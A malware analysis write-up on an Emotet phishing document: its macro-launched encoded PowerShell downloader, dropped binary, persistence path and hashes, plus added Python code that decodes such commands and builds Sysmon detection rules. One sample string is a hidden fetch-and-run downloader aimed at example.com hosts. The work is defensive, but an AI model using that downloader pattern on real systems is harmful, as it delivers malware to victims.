Malware Analysis: Rech-49415128555.doc (Emotet)

On August 21st, quite a few people across organizations received this document in what looks like a large phishing campaign. I wanted to understand what this malware does, as it had very low detection on VirusTotal. Here is my effort to understand the malware and to record indicators for further hunting and investigation.

Step 1:

Identifying the malicious document

MD5: 2f8222f053940fcf6436759762967f45
SHA-1: bcd6f936d1195c265dab3b559a132e08f7a7052f

VirusTotal Link


Looks like some kind of dropper. It was interesting that VT first saw this file in 2010, while the first submission was on August 21st. Where was it hiding for 7 years?

Step 2:

Detonating the malware

I run a couple of custom (Windows 7 and Windows 10) sandboxes with Sysmon from Sysinternals. All web traffic is routed through an intercepting web proxy. The network traffic is analyzed, and all metadata is extracted and stored.

What did I learn? (End users are the weakest link)

The first thing the document does is trick the user into thinking that it is locked / protected, so that they enable macros.


Enabling the macro executes PowerShell

[Image: stage 1.JPG]

This seems to download a binary with MD5 C2FCFB112BB4824FC542D7AB8DFDB627. Searching VT, I realized this is Emotet malware. Not surprisingly, this one has a detection rate of over 50%.


Once this executes, it sets up persistence and moves itself from %TEMP% to %USERPROFILE%\AppData\Local\Microsoft\Windows\shedulesystem.exe

C2 IP: (Digital Ocean)




Now that I knew this was Emotet, I didn't want to waste too much time on it, but I wanted to make sure I got all the IOCs out. Decoding the Base64-encoded PowerShell command gives this:

[Image: decoded ps.JPG]

Slightly modifying the code to print the "URL" instead of invoking it gave me all 5 domains:

[Image: stage domains.JPG]
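The same result can be had without running any of the malware's code at all. The block below is an added example, not code from the original post: it decodes a `-EncodedCommand` blob the way PowerShell does (base64 over UTF-16LE, with any lost `=` padding restored) and then harvests the URLs and the drop directory with regular expressions. The sample script is constructed here to mirror the `'a@b@c'.Split('@')` downloader idiom; its five domains are RFC 2606 reserved names, not the real IOCs, and the `-NoP -W Hidden -Enc` command line is likewise made up.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed sample in the style of the macro's PowerShell downloader.
# The domains are RFC 2606 reserved names, NOT the IOCs from the real document.
SAMPLE_SCRIPT = (
    "$w=New-Object System.Net.WebClient;"
    "$u='http://example.com/wp-content/x/@http://example.net/x/@"
    "http://example.org/img/@http://sub.example.com/a/@http://example.edu/b/'.Split('@');"
    "$p=$env:temp+'\\'+[string](Get-Random)+'.exe';"
    "foreach($d in $u){try{$w.DownloadFile($d.ToString(),$p);"
    "Invoke-Item $p;break;}catch{}}"
)

# -e / -ec / -enc / -EncodedCommand followed by the base64 blob, as seen in a logged command line.
ENC_ARG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"@)]+", re.IGNORECASE)
DROP_RE = re.compile(r"\$\w+\s*=\s*(\$env:\w+)", re.IGNORECASE)


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def encoded_from_cmdline(cmdline: str) -> Optional[str]:
    """Pull the base64 blob out of a full command line such as the one Sysmon records."""
    m = ENC_ARG.search(cmdline)
    return m.group(1) if m else None


def decode_command(encoded: str) -> str:
    """Reverse -EncodedCommand. Trailing '=' padding is restored because blobs copied
    out of logs or screenshots are frequently truncated."""
    padded = encoded + "=" * (-len(encoded) % 4)
    return base64.b64decode(padded).decode("utf-16le")


def extract_urls(script: str) -> List[str]:
    """List every URL in the decoded script, in order, without executing anything.
    The '@'-joined literal plus .Split('@') is how these downloaders carry several
    fallback hosts in one string."""
    urls: List[str] = []
    for u in URL_RE.findall(script):
        if u not in urls:
            urls.append(u)
    return urls


def extract_drop_dir(script: str) -> Optional[str]:
    """Report which environment variable the payload path is built from ($env:temp here)."""
    m = DROP_RE.search(script)
    return m.group(1) if m else None


def triage(cmdline: str) -> Dict[str, object]:
    """Static triage of a logged PowerShell command line: decode, then harvest IOCs."""
    blob = encoded_from_cmdline(cmdline)
    if blob is None:
        raise ValueError("no -EncodedCommand argument found")
    script = decode_command(blob)
    return {"script": script, "urls": extract_urls(script), "drop_dir": extract_drop_dir(script)}


if __name__ == "__main__":
    # Constructed command line of the shape a Sysmon process-create event would carry.
    logged = "powershell -NoP -NonI -W Hidden -Exec Bypass -Enc " + encode_command(SAMPLE_SCRIPT)
    result = triage(logged)
    print("drop dir:", result["drop_dir"])
    for url in result["urls"]:
        print(url)
```

Feeding `triage()` the `CommandLine` field straight from the Sysmon event avoids the temptation to paste the blob into a console; if a sample uses string concatenation or a second encoding layer instead of one literal, the URL regex will come back short and the decoded `script` field is there to read by hand.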

Step 3:

Back to basics


Take all the IOCs and build a use case for the SIEM / SOC. #DFIR FTW! I hope you enjoy reading this as much as I enjoyed doing it.
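One way to turn the behaviours and hashes from this write-up into detection logic, as an added example that is not part of the original post: the records below are constructed Sysmon-style events (Event ID 1 process create and Event ID 11 file create, using Sysmon's own field names) that model the chain observed above, with a placeholder user and made-up Temp file name; the two MD5s are the ones from this page, while the rule names, the `chain_score` threshold and the benign control event are my own.

```python
import re
from typing import Callable, Dict, List

# IOCs from the write-up above: MD5 of the .doc and of the dropped Emotet binary.
KNOWN_MD5 = {
    "2f8222f053940fcf6436759762967f45",  # Rech-49415128555.doc
    "c2fcfb112bb4824fc542d7ab8dfdb627",  # dropped binary
}

OFFICE = ("winword.exe", "excel.exe", "powerpnt.exe")
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE)
PERSIST_PATH = re.compile(r"\\AppData\\Local\\Microsoft\\Windows\\[^\\]+\.exe$", re.IGNORECASE)

# Constructed Sysmon-style events (not logs from the author's sandbox). Index 5 is a
# benign control: an admin running encoded PowerShell from a console.
EVENTS: List[Dict[str, object]] = [
    {"EventID": 1, "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\Rech-49415128555.doc"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": "powershell -nop -w hidden -enc " + "JAB" * 20},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\137.exe"},
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Local\Temp\137.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\137.exe",
     "Hashes": "MD5=C2FCFB112BB4824FC542D7AB8DFDB627"},
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Local\Microsoft\Windows\shedulesystem.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\137.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Microsoft\Windows\shedulesystem.exe",
     "Hashes": "MD5=C2FCFB112BB4824FC542D7AB8DFDB627"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -enc " + "SQB" * 20},
]


def _base(path: object) -> str:
    return str(path).rsplit("\\", 1)[-1].lower()


def _md5(hashes: object) -> str:
    m = re.search(r"MD5=([0-9A-Fa-f]{32})", str(hashes))
    return m.group(1).lower() if m else ""


# Each rule is an independent predicate over one event so it can be tuned and tested
# alone; correlation across the chain happens in chain_score().
RULES: Dict[str, Callable[[Dict[str, object]], bool]] = {
    "office_spawns_powershell": lambda e: e["EventID"] == 1
        and _base(e.get("ParentImage", "")) in OFFICE
        and _base(e["Image"]) == "powershell.exe",
    "encoded_powershell": lambda e: e["EventID"] == 1
        and _base(e["Image"]) == "powershell.exe"
        and ENC_FLAG.search(str(e.get("CommandLine", ""))) is not None,
    "exe_in_localappdata_microsoft_windows": lambda e: PERSIST_PATH.search(
        str(e.get("TargetFilename", "")) if e["EventID"] == 11 else str(e.get("Image", ""))
    ) is not None,
    "known_bad_md5": lambda e: e["EventID"] == 1 and _md5(e.get("Hashes", "")) in KNOWN_MD5,
}


def evaluate(events: List[Dict[str, object]]) -> Dict[str, List[int]]:
    """Run every rule over every event; returns rule name -> indexes of matching events."""
    hits: Dict[str, List[int]] = {name: [] for name in RULES}
    for i, e in enumerate(events):
        for name, pred in RULES.items():
            if pred(e):
                hits[name].append(i)
    return hits


def chain_score(events: List[Dict[str, object]]) -> int:
    """Number of distinct rules that fired. Encoded PowerShell on its own is noisy;
    two or more of these firing on one host is worth an analyst's time."""
    return sum(1 for idxs in evaluate(events).values() if idxs)


if __name__ == "__main__":
    for name, idxs in evaluate(EVENTS).items():
        print(f"{name}: {idxs}")
    print("chain score:", chain_score(EVENTS))
```

The hash rule only catches this exact binary and will age fast; the three behavioural rules (Office spawning PowerShell, an encoded command line, an executable living under `%LOCALAPPDATA%\Microsoft\Windows`) are what survive the next repack, and scoring them together keeps the lone `-enc` from a sysadmin's console from paging anyone.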